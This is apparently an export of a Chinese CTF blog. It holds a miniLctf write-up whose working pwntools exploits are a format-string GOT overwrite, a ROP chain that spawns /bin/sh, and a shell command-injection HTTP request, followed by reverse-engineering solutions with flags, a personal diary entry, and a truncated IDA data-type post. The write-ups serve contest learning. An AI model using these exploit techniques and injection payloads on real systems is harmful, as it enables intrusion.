src="https://i.loli.net/2021/05/08/rldh9mqbM3nyzuj.png" class="lazyload" data-srcset="https://i.loli.net/2021/05/08/rldh9mqbM3nyzuj.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="eqqieyyds2.png"></p><hr><h3 id="PWN2-easy-repeater-Worked-BB"><a href="#PWN2-easy-repeater-Worked-BB" class="headerlink" title="PWN2-easy_repeater | Worked: BB"></a>PWN2-easy_repeater | Worked: BB</h3><p>简单的白给</p><h4 id="EXP-3"><a href="#EXP-3" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">binary = <span class="string">'./baby_repeater'</span></span><br><span class="line">context(arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>,log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(binary,env={'LD_PRELOAD':'./libc-2.31.so'})</span></span><br><span class="line">p = remote(<span class="string">'pwn.woooo.tech'</span>, <span class="number">10209</span>)</span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.31.so"</span>)</span><br><span class="line"></span><br><span class="line">ru = <span class="keyword">lambda</span> x:p.recvuntil(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y:p.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y:p.sendafter(x,y)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p, 'b *$rebase(0x145d)\nc\nx/gx $rebase(0x3258)\n')</span></span><br><span class="line">sla(<span class="string">"> "</span>,<span class="string">b'%111$p'</span>)</span><br><span class="line">ru(<span class="string">"Your sentence: 0x"</span>)</span><br><span class="line"></span><br><span class="line">libc_start_addr = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line">libc_base = libc_start_addr - libc.sym[<span class="string">'__libc_start_main'</span>] - <span class="number">243</span></span><br><span class="line">shell_addr = libc_base + <span class="number">0xe6c81</span></span><br><span class="line"></span><br><span class="line">log.success(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">log.success(<span class="string">'shell_addr--->'</span>+<span class="built_in">hex</span>(shell_addr))</span><br><span class="line"></span><br><span class="line">sla(<span class="string">"> "</span>,<span class="string">b'%107$p'</span>)</span><br><span class="line">ru(<span class="string">"Your sentence: 0x"</span>)</span><br><span class="line">main_addr = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>) - <span class="number">42</span></span><br><span class="line">log.success(<span class="string">'main_addr--->'</span>+<span class="built_in">hex</span>(main_addr))</span><br><span class="line"></span><br><span class="line">base = main_addr - <span class="number">0x14d5</span></span><br><span class="line"></span><br><span class="line">hook_got = elf.got[<span class="string">'exit'</span>] + base</span><br><span class="line">log.success(<span class="string">"hook_got---->"</span>+<span class="built_in">hex</span>(hook_got))</span><br><span class="line">payload1=fmtstr_payload(<span class="number">8</span>, {hook_got: shell_addr},numbwritten=<span class="number">15</span>)</span><br><span class="line">log.info(<span class="built_in">str</span>(<span class="built_in">len</span>(payload1)))</span><br><span class="line">sla(<span class="string">"> "</span>,payload1)</span><br><span class="line">print(payload1)</span><br><span class="line">sla(<span class="string">"> "</span>,<span class="string">"exit"</span>)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0xe6c7e execve("/bin/sh", r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe6c81 execve("/bin/sh", r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe6c84 execve("/bin/sh", rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure><hr><h3 id="PWN3-twins-Worked-BB"><a href="#PWN3-twins-Worked-BB" class="headerlink" title="PWN3-twins | Worked: BB"></a>PWN3-twins | Worked: BB</h3><p>“拟态防御”,第一次见这个还是挺有意思的……</p><p>还算是很简单的啦<code>=_=</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line">binary = <span class="string">'./pwn1'</span></span><br><span class="line">context(log_level=<span class="string">'debug'</span>)</span><br><span class="line">p=process(binary)</span><br><span class="line">p = remote(<span class="string">"pwn.woooo.tech"</span>, <span class="number">10268</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x:p.recvuntil(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y:p.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y:p.sendafter(x,y)</span><br><span class="line">sl = <span class="keyword">lambda</span> x:p.sendline(x)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 64</span></span><br><span class="line">pop_rax = <span class="number">0x0000000000451a57</span></span><br><span class="line">pop_rdi = <span class="number">0x000000000040185a</span></span><br><span class="line">pop_rdx = <span class="number">0x000000000040175f</span></span><br><span class="line">pop_rsi = <span class="number">0x000000000040f3fe</span></span><br><span class="line">binsh_addr_x64 = <span class="number">0x00000004c5220</span></span><br><span class="line">syscall_ret = <span class="number">0x000000487c99</span></span><br><span class="line">add_rsp = <span class="number">0x00000000004029c2</span> <span class="comment"># 0x98</span></span><br><span class="line"><span class="comment"># 32</span></span><br><span class="line">gets_addr = <span class="number">0x8058474</span></span><br><span class="line">pop_eax = <span class="number">0x080b05ca</span></span><br><span class="line">pop_edx_ebx = <span class="number">0x0805ede9</span></span><br><span class="line">pop_ecx = <span class="number">0x080642b1</span></span><br><span class="line">binsh_addr = <span class="number">0x80e83c0</span></span><br><span class="line">int_addr = <span class="number">0x0804a402</span></span><br><span class="line">add_esp = <span class="number">0x0804b08e</span> <span class="comment">#0x2c</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">0x44</span> + <span class="string">b'b'</span>*<span class="number">0x4</span></span><br><span class="line">payload += p32(add_esp)</span><br><span class="line">payload += <span class="string">b'c'</span>*<span class="number">12</span></span><br><span class="line">payload += p64(add_rsp)</span><br><span class="line">payload += <span class="string">b'd'</span>*<span class="number">24</span></span><br><span class="line"></span><br><span class="line">payload += p32(gets_addr) + p32(pop_eax) + p32(binsh_addr)</span><br><span class="line">payload += p32(pop_ecx) + p32(<span class="number">0</span>)</span><br><span class="line">payload += p32(pop_edx_ebx) + p32(<span class="number">0</span>) + p32(binsh_addr)</span><br><span class="line">payload += p32(pop_eax) + p32(<span class="number">0xb</span>)</span><br><span class="line">payload += p32(int_addr)</span><br><span class="line"></span><br><span class="line">payload += <span class="string">b'd'</span>*<span class="number">0x54</span></span><br><span class="line">payload += p64(pop_rax) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rsi) + p64(binsh_addr_x64)</span><br><span class="line">payload += p64(pop_rdx) + p64(<span class="number">0x100</span>)</span><br><span class="line">payload += p64(syscall_ret)</span><br><span class="line">payload += p64(pop_rax) + p64(<span class="number">59</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(binsh_addr_x64)</span><br><span class="line">payload += p64(pop_rsi) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rdx) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(syscall_ret)</span><br><span class="line"></span><br><span class="line">sla(<span class="string">"say ?\n"</span>, payload)</span><br><span class="line">sl(<span class="string">b'/bin/sh\x00'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><hr><h3 id="PWN4-Cross-Platform-Calculator-Worked-BB-amp-Noah-amp-Wanan"><a href="#PWN4-Cross-Platform-Calculator-Worked-BB-amp-Noah-amp-Wanan" class="headerlink" title="PWN4-Cross Platform Calculator | Worked:BB&Noah&Wanan"></a>PWN4-Cross Platform Calculator | Worked:BB&Noah&Wanan</h3><p>我的思路一开始就是正确的!!!!</p><p>找了个<code>web</code>手帮我进行命令注入~</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./httpd'</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p,"b *$rebase(0x160E)")</span></span><br><span class="line"><span class="built_in">input</span>()</span><br><span class="line">payload = <span class="string">'''GET /calc?x=`cat$IFS./flag`));echo$IFS$((1&y=1&action=add HTTP/1.1\r\n'''</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line">p.recv()</span><br></pre></td></tr></table></figure><hr><h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="RE2-sub-Worked-BB-amp-Noah"><a href="#RE2-sub-Worked-BB-amp-Noah" class="headerlink" title="RE2-sub | Worked: BB&Noah"></a>RE2-sub | Worked: BB&Noah</h3><p>傀儡进程,附加段。</p><p>查看段发现<code>.what?</code>,比较容易看出是每一个字节异或一个定值,用文件头算出<code>key</code>值,然后得到真正的进程</p><p><code>dump</code>内存,直接重新分析。</p><p>很明显,这是一个</p><p><code>check</code>函数相当于是一个函数指针(应该叫做虚表结构),<code>x</code>一下,发现它还有另外一个函数</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">key=[<span class="number">0x5A</span>,<span class="number">0x46</span>,<span class="number">0x59</span>,<span class="number">0x46</span>,<span class="number">0x7B</span>,<span class="number">0x5C</span>,<span class="number">0x43</span>,<span class="number">0x51</span>,<span class="number">0x74</span>,<span class="number">0x63</span>,<span class="number">0x47</span>,<span class="number">0x0E</span>,<span class="number">0x4C</span>,<span class="number">0x68</span>,<span class="number">0x0E</span>,<span class="number">0x4C</span>,<span class="number">0x68</span>,<span class="number">0x43</span>,<span class="number">0x47</span>,<span class="number">0x3</span>,<span class="number">0x68</span>,<span class="number">0x51</span>,<span class="number">0x5E</span>,<span class="number">0x44</span>,<span class="number">0x3</span>,<span class="number">0x68</span>,<span class="number">0x51</span>,<span class="number">0x0E</span>,<span class="number">0x5E</span>,<span class="number">0x50</span>,<span class="number">0x1E</span>,<span class="number">0x4A</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line"> tmp = key[i]^<span class="number">0x55</span></span><br><span class="line"> tmp -= <span class="number">4</span></span><br><span class="line"> print(<span class="built_in">chr</span>(tmp^<span class="number">0x66</span>),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment">#miniLctf{Th1s_1s_th4_fak4_f1ag!}</span></span><br><span class="line"></span><br><span class="line">key = [<span class="number">0x5A</span>,<span class="number">0x26</span>,<span class="number">0x59</span>,<span class="number">0x26</span>,<span class="number">0x7B</span>,<span class="number">0x5C</span>,<span class="number">0x43</span>,<span class="number">0x51</span>,<span class="number">0x54</span>,<span class="number">0x6D</span>,<span class="number">0x52</span>,<span class="number">0x68</span>,<span class="number">0x0E</span>,<span class="number">0x4C</span>,<span class="number">0x68</span>,<span class="number">0x4C</span>,<span class="number">0x0F</span>,<span class="number">0x68</span>,<span class="number">0x0E</span>,<span class="number">0x59</span>,<span class="number">0x43</span>,<span class="number">0x3</span>,<span class="number">0x4D</span>,<span class="number">0x3</span>,<span class="number">0x4C</span>,<span class="number">0x43</span>,<span class="number">0x0E</span>,<span class="number">0x59</span>,<span class="number">0x50</span>,<span class="number">0x1E</span>,<span class="number">0x1E</span>,<span class="number">0x4A</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line"> tmp = key[i]^<span class="number">0x66</span></span><br><span class="line"> tmp -= <span class="number">4</span></span><br><span class="line"> print(<span class="built_in">chr</span>(tmp^<span class="number">0x55</span>),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># miniLctf{Re_1s_s0_1nt4r4st1ng!!}</span></span><br></pre></td></tr></table></figure><hr><h3 id="RE3-Ooooops-Worked-BB"><a href="#RE3-Ooooops-Worked-BB" class="headerlink" title="RE3-Ooooops | Worked: BB"></a><code>RE3-Ooooops </code>| Worked: BB</h3><p>这个题吧,没啥说的,直接上<code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">brute</span>(<span class="params">x</span>):</span></span><br><span class="line"> print(<span class="string">"[@_@] "</span>, x, <span class="string">": "</span>)</span><br><span class="line"> flag = [<span class="string">"m"</span>, <span class="string">"i"</span>, <span class="string">"n"</span>, <span class="string">"i"</span>, <span class="string">"l"</span>, <span class="string">"c"</span>, <span class="string">"t"</span>, <span class="string">"f"</span>, <span class="string">"{"</span>]</span><br><span class="line"> v4 = <span class="string">"!V -}VG-bp}m-nG!b|ra GyGE|Drp D"</span></span><br><span class="line"> v3 = [<span class="number">16</span>, <span class="number">4</span>, <span class="number">24</span>, <span class="number">11</span>, <span class="number">24</span>, <span class="number">16</span>, <span class="number">4</span>, <span class="number">21</span>, <span class="number">11</span>, <span class="number">5</span>, <span class="number">31</span>, <span class="number">46</span>, <span class="number">33</span>, <span class="number">46</span>, <span class="number">72</span>, <span class="number">21</span>, <span class="number">6</span>, <span class="number">46</span>, <span class="number">17</span>, <span class="number">59</span>, <span class="number">5</span>, </span><br><span class="line"> <span class="number">62</span>, <span class="number">46</span>, <span class="number">24</span>, <span class="number">21</span>, <span class="number">72</span>, <span class="number">46</span>, <span class="number">59</span>, <span class="number">33</span>, <span class="number">31</span>, <span class="number">10</span>]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">200</span>):</span><br><span class="line"> flag.append(<span class="string">""</span>)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> flag[<span class="number">9</span> + <span class="number">2</span> * i] = <span class="built_in">chr</span>((((v3[i]) ^ <span class="number">0x42</span>) - <span class="number">4</span>) ^ <span class="number">0x37</span>)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1f</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> flag[<span class="number">9</span> + <span class="number">2</span> * i + <span class="number">1</span>] = <span class="built_in">chr</span>(((<span class="built_in">ord</span>(v4[i]) ^ <span class="number">0x13</span> ^ x) + <span class="number">4</span>) ^ <span class="number">0x4D</span>)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> f = <span class="string">""</span>.join(flag)</span><br><span class="line"> print(<span class="string">"[?_?] "</span>, f)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">255</span>):<span class="comment">#暴力破解</span></span><br><span class="line"> brute(i)</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
</tags>
</entry>
<entry>
<title>记一次心态爆炸时的心路</title>
<link href="2021/03/06/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%BF%83%E6%80%81%E7%88%86%E7%82%B8%E6%97%B6%E7%9A%84%E5%BF%83%E8%B7%AF/"/>
<url>2021/03/06/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%BF%83%E6%80%81%E7%88%86%E7%82%B8%E6%97%B6%E7%9A%84%E5%BF%83%E8%B7%AF/</url>
<content type="html"><![CDATA[<p>今天心态十分爆炸,究其原因,只有一点——我太菜了。</p><p>我菜是一直以来的,但是我最近感觉自己尤其的菜。往往在这个时候,我才能看清自己,写点东西,让自己痛苦痛苦。</p><p>去年进了西电,貌似还不错,仗着自己高中不学无术了解的那一点点计算机知识,就感觉自己远超别人,就觉得自己牛逼坏了。其实,自己什么都不是。周围的人,真正厉害的,大一都已经保研了……但我还沉醉于自己很牛逼的假象之中,不愿意认清自己很菜的事实。</p><p>在西电,一直忙着各种事情,跟着师傅们、学长们,一获得点成就就沾沾自喜,总是用之前微不足道的成绩来骗自己。殊不知,之前比我强的,依旧比我强;之前比我弱的,也比我强了……</p><p>而当事实把我叫醒时,也就是最近,我自然就出现心态爆炸的情况。怨不得别人,只能怨自己。</p><p>有时候,我挺瞧不起自己的。瞧不起那个没出息、没本事、没技术,还自诩牛逼的自己,关键是,他还不愿意认清自己,不愿意人情自己菜的本质。非要犯贱,等到事实打疼他,他才看清真相……</p><p>啰里八嗦,说了很多气话,同时也是真话。希望自己不要等不疼了,就忘记了现在的难受。好了,就这样吧,别瞎想了,继续学习吧。加油!</p><p>最后记着:</p><ul><li>你很菜,你什么都不会,别成天拽不拉几的</li><li>别人比你强的时候,他就是你爹;当你觉得你比他强的时候,那就是你又膨胀了</li><li>低头,认个不行,没什么大不了的,学会就好了</li></ul>]]></content>
<categories>
<category> 杂记 </category>
</categories>
<tags>
<tag> 杂记 </tag>
</tags>
</entry>
<entry>
<title>关于RX一个题的思考</title>
<link href="2021/02/23/IDA%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/"/>
<url>2021/02/23/IDA%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/</url>
<content type="html"><![CDATA[<p>说实话,其实谈不上是思考,只能说是一个题目在仔细研究的时候终于理清了一些奇奇怪怪的东西,所以整理一下。不说啥了,<code>RX,yyds</code></p><p>题目是Re学习之RX引路-week1的第三题<code>GWCTF 2019 xxor</code></p><h2 id="前置知识:"><a href="#前置知识:" class="headerlink" title="前置知识:"></a>前置知识:</h2><ul><li><code>C</code>语言数据类型大小与范围</li></ul><table><thead><tr><th>类型名称</th><th>arch</th><th>字节数</th><th>位数</th></tr></thead><tbody><tr><td><code>char</code></td><td>*</td><td>1</td><td>8</td></tr><tr><td><code>short int</code></td><td>*</td><td>2</td><td>16</td></tr><tr><td><code>int</code></td><td>*</td><td>4</td><td>32</td></tr><tr><td><code>long</code></td><td><code>win</code></td><td>4</td><td>32</td></tr><tr><td></td><td><code>linux32</code></td><td>4</td><td>32</td></tr><tr><td></td><td><code>linux64</code></td><td>8</td><td>64</td></tr><tr><td><code>long long</code></td><td><code>*</code></td><td>8</td><td>64</td></tr></tbody></table><ul><li><p><code>IDA</code>中涉及的一些数据类型:</p><p>我们写个程序在<code>IDA</code>里面看看,这是第一个版本:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"> <span class="keyword">int</span> a;</span><br><span class="line"> <span class="keyword">long</span> b;</span><br><span class="line"> <span class="keyword">long</span> <span class="keyword">long</span> c;</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%d\n%ld\n%lld"</span>,<span class="keyword">sizeof</span>(a),<span class="keyword">sizeof</span>(b),<span class="keyword">sizeof</span>(c));</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>但是<code>IDA</code>的代码直接给我<code>printf(4)</code>……并没有在堆栈里面显示我声明的三个变量,我瞬间就不爽了。</p><p>所以这是第二版:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"> <span class="keyword">int</span> a;</span><br><span class="line"> <span class="keyword">long</span> b;</span><br><span class="line"> <span class="keyword">long</span> <span class="keyword">long</span> c;</span><br><span class="line"> <span class="built_in">scanf</span>(<span class="string">"%d"</span>,&a);</span><br><span class="line"> <span class="built_in">scanf</span>(<span class="string">"%ld"</span>,&b);</span><br><span class="line"> <span class="built_in">scanf</span>(<span class="string">"%lld"</span>,&c);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%lld\n"</span>,a+b+c);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"int %d\n"</span>,<span class="keyword">sizeof</span>(a));</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"long %d\n"</span>,<span class="keyword">sizeof</span>(b));</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"long long %d\n"</span>,<span class="keyword">sizeof</span>(c));</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>我们看看堆栈内容:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231125420850.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231125420850.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201231125420850"></p></li></ul><p>我们看到那里有一个<code>dd</code>,<code>dq</code>,这里是用来表述数据大小,相似的还有<code>db</code>、<code>dw</code></p><table><thead><tr><th>标记</th><th>全称</th><th>大小/字节</th></tr></thead><tbody><tr><td><code>db</code></td><td><code>define byte</code></td><td>1</td></tr><tr><td><code>dw</code></td><td><code>define word</code></td><td>2</td></tr><tr><td><code>dd</code></td><td><code>define double word</code></td><td>4</td></tr><tr><td><code>dq</code></td><td><code>define quad word</code></td><td>8</td></tr></tbody></table><p>这里的<code>word</code>和计算机的字长不一样,我们所说的计算机字长是指他的总线宽度。所以不同的<code>arch</code>对应的字长是不一样的,而<code>word</code>做为一个单位由于它是来源于16位机,所以当<code>word</code>作为一个空间大小单位的时候,固定为2<code>bytes</code>。</p><table><thead><tr><th><code>Archieve</code></th><th>总线宽度</th><th>字长</th></tr></thead><tbody><tr><td>8086</td><td>16位</td><td>2</td></tr><tr><td>x86</td><td>32位</td><td>4</td></tr><tr><td>x64</td><td>64位</td><td>8</td></tr></tbody></table><p>下面我们可以来看看这个题目了。</p><h2 id="题目复现"><a href="#题目复现" class="headerlink" title="题目复现"></a>题目复现</h2><h3 id="总述WP"><a href="#总述WP" class="headerlink" title="总述WP"></a>总述WP</h3><p><code>DIE</code>查一下,没什么……拖进<code>IDA64</code>,<code>woc</code>惊喜!没扣符号表!!!</p><p>找到<code>main</code>函数,美化一下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line"> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line"> __int64 v6[<span class="number">6</span>]; <span class="comment">// [rsp+10h] [rbp-60h] BYREF</span></span><br><span class="line"> __int64 v7[<span 